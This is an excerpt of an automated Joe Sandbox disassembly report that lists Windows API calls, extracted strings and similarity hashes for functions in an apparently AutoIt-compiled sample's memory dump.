                                              • SetWindowTextW.USER32(00000000,?), ref: 0008CC04
                                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0008CC25
                                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0008CC3F
                                              • GetWindowRect.USER32(?,?), ref: 0008CC48
                                              • SetWindowTextW.USER32(?,?), ref: 0008CCB3
                                              • GetDesktopWindow.USER32 ref: 0008CCB9
                                              • GetWindowRect.USER32(00000000), ref: 0008CCC0
                                              • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0008CD0C
                                              • GetClientRect.USER32(?,?), ref: 0008CD19
                                              • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0008CD3E
                                              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0008CD69
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                              • String ID:
                                              • API String ID: 3869813825-0
                                              • Opcode ID: 152db26fd8d96c524c9dc987264956ba351def261443a533df94b3694465d313
                                              • Instruction ID: afa3c15fb83ba7e334424caf2b15325f86099d53c54c959680e7bde286451b08
                                              • Opcode Fuzzy Hash: 152db26fd8d96c524c9dc987264956ba351def261443a533df94b3694465d313
                                              • Instruction Fuzzy Hash: 4C515E70900709EFEB20EFA8CE89FAEBBF5FF04705F004528E586A25A0C774A954CB50
                                              APIs
                                              • _memset.LIBCMT ref: 000BA87E
                                              • DestroyWindow.USER32(00000000,?), ref: 000BA8F8
                                                • Part of subcall function 00041821: _memmove.LIBCMT ref: 0004185B
                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 000BA972
                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 000BA994
                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 000BA9A7
                                              • DestroyWindow.USER32(00000000), ref: 000BA9C9
                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00030000,00000000), ref: 000BAA00
                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 000BAA19
                                              • GetDesktopWindow.USER32 ref: 000BAA32
                                              • GetWindowRect.USER32(00000000), ref: 000BAA39
                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 000BAA51
                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 000BAA69
                                                • Part of subcall function 000329AB: GetWindowLongW.USER32(?,000000EB), ref: 000329BC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                              • String ID: 0$tooltips_class32
                                              • API String ID: 1297703922-3619404913
                                              • Opcode ID: 9833d9b7f35e7892229e9b65648fafc3649b0a83e20cbc28024302effa883a3a
                                              • Instruction ID: 907f51b0efc04d32940db008fe6ce4dbb7e1ac6b3388f0e799f95f0c97fa3a0d
                                              • Opcode Fuzzy Hash: 9833d9b7f35e7892229e9b65648fafc3649b0a83e20cbc28024302effa883a3a
                                              • Instruction Fuzzy Hash: FD717971244204AFE721CF28CC49FAB77E5EB8A304F04461DF989972A1DB75AD06DB62
                                              APIs
                                              • VariantInit.OLEAUT32(00000000), ref: 0009831A
                                              • VariantCopy.OLEAUT32(00000000,?), ref: 00098323
                                              • VariantClear.OLEAUT32(00000000), ref: 0009832F
                                              • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0009841D
                                              • __swprintf.LIBCMT ref: 0009844D
                                              • VarR8FromDec.OLEAUT32(?,?), ref: 00098479
                                              • VariantInit.OLEAUT32(?), ref: 0009852A
                                              • SysFreeString.OLEAUT32(?), ref: 000985BE
                                              • VariantClear.OLEAUT32(?), ref: 00098618
                                              • VariantClear.OLEAUT32(?), ref: 00098627
                                              • VariantInit.OLEAUT32(00000000), ref: 00098665
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                              • String ID: %4d%02d%02d%02d%02d%02d$Default
                                              • API String ID: 3730832054-3931177956
                                              • Opcode ID: e14b87818172dcf862ec69f0cda943cc49afc933fe96b1fe3ecbeae907eac5d2
                                              • Instruction ID: 689d07aab95f9f146c7519a6de42f902209988e01698b8891f9c3f6b485bcd75
                                              • Opcode Fuzzy Hash: e14b87818172dcf862ec69f0cda943cc49afc933fe96b1fe3ecbeae907eac5d2
                                              • Instruction Fuzzy Hash: 73D1BD71604515EBDF609FA5C884BBEB7B4BF06B00F14C155E805EB292DF34EA44EBA1
                                              APIs
                                              • CharUpperBuffW.USER32(?,?), ref: 000B4A61
                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 000B4AAC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: BuffCharMessageSendUpper
                                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                              • API String ID: 3974292440-4258414348
                                              • Opcode ID: 6dc74b22f79efafb8a4f9ffe6a7d6f9ffa250d3711eb88decf8d38184f6ce6a7
                                              • Instruction ID: b87e2e719e36e4e27fc8b0a8bd514174d245e695e1d97cf24c30765ea96f7077
                                              • Opcode Fuzzy Hash: 6dc74b22f79efafb8a4f9ffe6a7d6f9ffa250d3711eb88decf8d38184f6ce6a7
                                              • Instruction Fuzzy Hash: 94918A742046019FCB14EF20C451AEEB7A5AF94354F108869F8965B3A3CB35FE4ACB92
                                              APIs
                                              • GetLocalTime.KERNEL32(?), ref: 0009E31F
                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 0009E32F
                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0009E33B
                                              • __wsplitpath.LIBCMT ref: 0009E399
                                              • _wcscat.LIBCMT ref: 0009E3B1
                                              • _wcscat.LIBCMT ref: 0009E3C3
                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0009E3D8
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0009E3EC
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0009E41E
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0009E43F
                                              • _wcscpy.LIBCMT ref: 0009E44B
                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0009E48A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                              • String ID: *.*
                                              • API String ID: 3566783562-438819550
                                              • Opcode ID: e788cf253277ff05b4d4ed4b5cc9edc32cac1208b7fedcf7c39ba244f9576295
                                              • Instruction ID: dfa60ae0b4f9a57c22a6e7ea6bb41acdcf9aef16710ee862e2dc6bb99c5c86d8
                                              • Opcode Fuzzy Hash: e788cf253277ff05b4d4ed4b5cc9edc32cac1208b7fedcf7c39ba244f9576295
                                              • Instruction Fuzzy Hash: 976127725046459FCB10EF60D885A9FB3E8BF89314F04892EF98987252DB35EE45CB92
                                              APIs
                                              • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0009A2C2
                                                • Part of subcall function 00041A36: _memmove.LIBCMT ref: 00041A77
                                              • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0009A2E3
                                              • __swprintf.LIBCMT ref: 0009A33C
                                              • __swprintf.LIBCMT ref: 0009A355
                                              • _wprintf.LIBCMT ref: 0009A3FC
                                              • _wprintf.LIBCMT ref: 0009A41A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: LoadString__swprintf_wprintf$_memmove
                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                              • API String ID: 311963372-3080491070
                                              • Opcode ID: e4daa7bef1aad00482e200e2f472eaab8a5d1dd6b86224684ea67be229d31ff3
                                              • Instruction ID: 34f338169cc3a22a4fcb8cbde0204fbc40caafa19d42b3fdea3234de82293747
                                              • Opcode Fuzzy Hash: e4daa7bef1aad00482e200e2f472eaab8a5d1dd6b86224684ea67be229d31ff3
                                              • Instruction Fuzzy Hash: 2D51B3B1900219BADF15EBE0CD46EEEB7B9AF08340F104165F505B2093EB352F98DBA1
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000001,?,0007F8B8,00000001,0000138C,00000001,00000001,00000001,?,000A3FF9,00000001), ref: 0009009A
                                              • LoadStringW.USER32(00000000,?,0007F8B8,00000001), ref: 000900A3
                                                • Part of subcall function 00041A36: _memmove.LIBCMT ref: 00041A77
                                              • GetModuleHandleW.KERNEL32(00000000,000F7310,?,00000FFF,?,?,0007F8B8,00000001,0000138C,00000001,00000001,00000001,?,000A3FF9,00000001,00000001), ref: 000900C5
                                              • LoadStringW.USER32(00000000,?,0007F8B8,00000001), ref: 000900C8
                                              • __swprintf.LIBCMT ref: 00090118
                                              • __swprintf.LIBCMT ref: 00090129
                                              • _wprintf.LIBCMT ref: 000901D2
                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 000901E9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                              • API String ID: 984253442-2268648507
                                              • Opcode ID: ff849639290aa9f439370b755f2d349468395dfda8ae1b9b98e020668663844e
                                              • Instruction ID: 03a774ac1bb35451fd6cce70b9d0130fefebcb4dfe75d0cc5a030da7d420a0d1
                                              • Opcode Fuzzy Hash: ff849639290aa9f439370b755f2d349468395dfda8ae1b9b98e020668663844e
                                              • Instruction Fuzzy Hash: 9F416FB290021DAACF14EBE0CD96DEEB778AF18340F500165F605B2093EB356F58DB65
                                              APIs
                                                • Part of subcall function 00034D37: __itow.LIBCMT ref: 00034D62
                                                • Part of subcall function 00034D37: __swprintf.LIBCMT ref: 00034DAC
                                              • CharLowerBuffW.USER32(?,?), ref: 0009AA0E
                                              • GetDriveTypeW.KERNEL32 ref: 0009AA5B
                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0009AAA3
                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0009AADA
                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0009AB08
                                                • Part of subcall function 00041821: _memmove.LIBCMT ref: 0004185B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                              • API String ID: 2698844021-4113822522
                                              • Opcode ID: 84b48353b31f0684e7c9266405866280204ab39c0b3b839390f3e451cbdc21a7
                                              • Instruction ID: 58ee20669f0070aee4be755c02b79f21f6e298f0c3e8b8a699217ca2aeeaf087
                                              • Opcode Fuzzy Hash: 84b48353b31f0684e7c9266405866280204ab39c0b3b839390f3e451cbdc21a7
                                              • Instruction Fuzzy Hash: 06515CB12043059FC700EF11D9819ABB7F8FF98758F10496DF895A7262DB31AE09CB92
                                              APIs
                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0009A852
                                              • __swprintf.LIBCMT ref: 0009A874
                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 0009A8B1
                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0009A8D6
                                              • _memset.LIBCMT ref: 0009A8F5
                                              • _wcsncpy.LIBCMT ref: 0009A931
                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0009A966
                                              • CloseHandle.KERNEL32(00000000), ref: 0009A971
                                              • RemoveDirectoryW.KERNEL32(?), ref: 0009A97A
                                              • CloseHandle.KERNEL32(00000000), ref: 0009A984
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                              • String ID: :$\$\??\%s
                                              • API String ID: 2733774712-3457252023
                                              • Opcode ID: 881c1615257568a161452813073328ba4dc38488d833ef9bc545846ed232b36b
                                              • Instruction ID: bc8552a5a3b4c1420c9ca0d9b6489606b11edca2bdee0a235778198c93eb8863
                                              • Opcode Fuzzy Hash: 881c1615257568a161452813073328ba4dc38488d833ef9bc545846ed232b36b
                                              • Instruction Fuzzy Hash: B131C171A0021AABDB219FA4DC49FEB73BCEF8A700F1041A6F908D2160EB749744CB65
                                              APIs
                                              • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,000B982C,?,?), ref: 000BC0C8
                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,000B982C,?,?,00000000,?), ref: 000BC0DF
                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,000B982C,?,?,00000000,?), ref: 000BC0EA
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,000B982C,?,?,00000000,?), ref: 000BC0F7
                                              • GlobalLock.KERNEL32(00000000,?,?,?,?,000B982C,?,?,00000000,?), ref: 000BC100
                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,000B982C,?,?,00000000,?), ref: 000BC10F
                                              • GlobalUnlock.KERNEL32(00000000,?,?,?,?,000B982C,?,?,00000000,?), ref: 000BC118
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,000B982C,?,?,00000000,?), ref: 000BC11F
                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,000B982C,?,?,00000000,?), ref: 000BC130
                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,000C3C7C,?), ref: 000BC149
                                              • GlobalFree.KERNEL32(00000000), ref: 000BC159
                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 000BC17D
                                              • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 000BC1A8
                                              • DeleteObject.GDI32(00000000), ref: 000BC1D0
                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 000BC1E6
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                              • String ID:
                                              • API String ID: 3840717409-0
                                              • Opcode ID: 52d9fa2de8584602dbd503d9654dd5922f46cee43d784b43ee16d433b8231e7d
                                              • Instruction ID: 47093ae57d6f25e60bebc45b9b36babcff6c3df34524c92ca3fd645432b2a5f1
                                              • Opcode Fuzzy Hash: 52d9fa2de8584602dbd503d9654dd5922f46cee43d784b43ee16d433b8231e7d
                                              • Instruction Fuzzy Hash: 10412B75540205EFEB619FA5DC88EAEBBB8EF89711F108058FD06E7260DB349D41DB60
                                              APIs
                                                • Part of subcall function 000329E2: GetWindowLongW.USER32(?,000000EB), ref: 000329F3
                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 000BC8A4
                                              • GetFocus.USER32 ref: 000BC8B4
                                              • GetDlgCtrlID.USER32(00000000), ref: 000BC8BF
                                              • _memset.LIBCMT ref: 000BC9EA
                                              • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 000BCA15
                                              • GetMenuItemCount.USER32(?), ref: 000BCA35
                                              • GetMenuItemID.USER32(?,00000000), ref: 000BCA48
                                              • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 000BCA7C
                                              • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 000BCAC4
                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 000BCAFC
                                              • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 000BCB31
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                              • String ID: 0
                                              • API String ID: 1296962147-4108050209
                                              • Opcode ID: a5a6b7aec73931edf6519ececb6376740047f18df93de307c71eaa24b6c08e7a
                                              • Instruction ID: bf89a9b478a9c25683b50c57ab3c110c7469e144871962716657b841ae1d9e1d
                                              • Opcode Fuzzy Hash: a5a6b7aec73931edf6519ececb6376740047f18df93de307c71eaa24b6c08e7a
                                              • Instruction Fuzzy Hash: 30817C702083459FE751DF14C985EAFBBE8FB88354F00492EF99997291C770D905CBA2
                                              APIs
                                                • Part of subcall function 00088E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00088E3C
                                                • Part of subcall function 00088E20: GetLastError.KERNEL32(?,00088900,?,?,?), ref: 00088E46
                                                • Part of subcall function 00088E20: GetProcessHeap.KERNEL32(00000008,?,?,00088900,?,?,?), ref: 00088E55
                                                • Part of subcall function 00088E20: HeapAlloc.KERNEL32(00000000,?,00088900,?,?,?), ref: 00088E5C
                                                • Part of subcall function 00088E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00088E73
                                                • Part of subcall function 00088EBD: GetProcessHeap.KERNEL32(00000008,00088916,00000000,00000000,?,00088916,?), ref: 00088EC9
                                                • Part of subcall function 00088EBD: HeapAlloc.KERNEL32(00000000,?,00088916,?), ref: 00088ED0
                                                • Part of subcall function 00088EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00088916,?), ref: 00088EE1
                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00088B2E
                                              • _memset.LIBCMT ref: 00088B43
                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00088B62
                                              • GetLengthSid.ADVAPI32(?), ref: 00088B73
                                              • GetAce.ADVAPI32(?,00000000,?), ref: 00088BB0
                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00088BCC
                                              • GetLengthSid.ADVAPI32(?), ref: 00088BE9
                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00088BF8
                                              • HeapAlloc.KERNEL32(00000000), ref: 00088BFF
                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00088C20
                                              • CopySid.ADVAPI32(00000000), ref: 00088C27
                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00088C58
                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00088C7E
                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00088C92
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                              • String ID:
                                              • API String ID: 3996160137-0
                                              • Opcode ID: bb22eb3ac5fa28ec8eee6e894ec4b75840c0ce56ece8b9559967fd2f1b1a510b
                                              • Instruction ID: d076ae6f5bc4fc7f4e06655321b45cef7814efb85822be1298fea1e6e773e2d9
                                              • Opcode Fuzzy Hash: bb22eb3ac5fa28ec8eee6e894ec4b75840c0ce56ece8b9559967fd2f1b1a510b
                                              • Instruction Fuzzy Hash: 6661547190020AEFDF10AFA4DC44EEEBBB9FF04300F54816AF955A6291DB359A15CB60
                                              APIs
                                              • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0009A4D4
                                                • Part of subcall function 00041A36: _memmove.LIBCMT ref: 00041A77
                                              • LoadStringW.USER32(?,?,00000FFF,?), ref: 0009A4F6
                                              • __swprintf.LIBCMT ref: 0009A54F
                                              • __swprintf.LIBCMT ref: 0009A568
                                              • _wprintf.LIBCMT ref: 0009A61E
                                              • _wprintf.LIBCMT ref: 0009A63C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
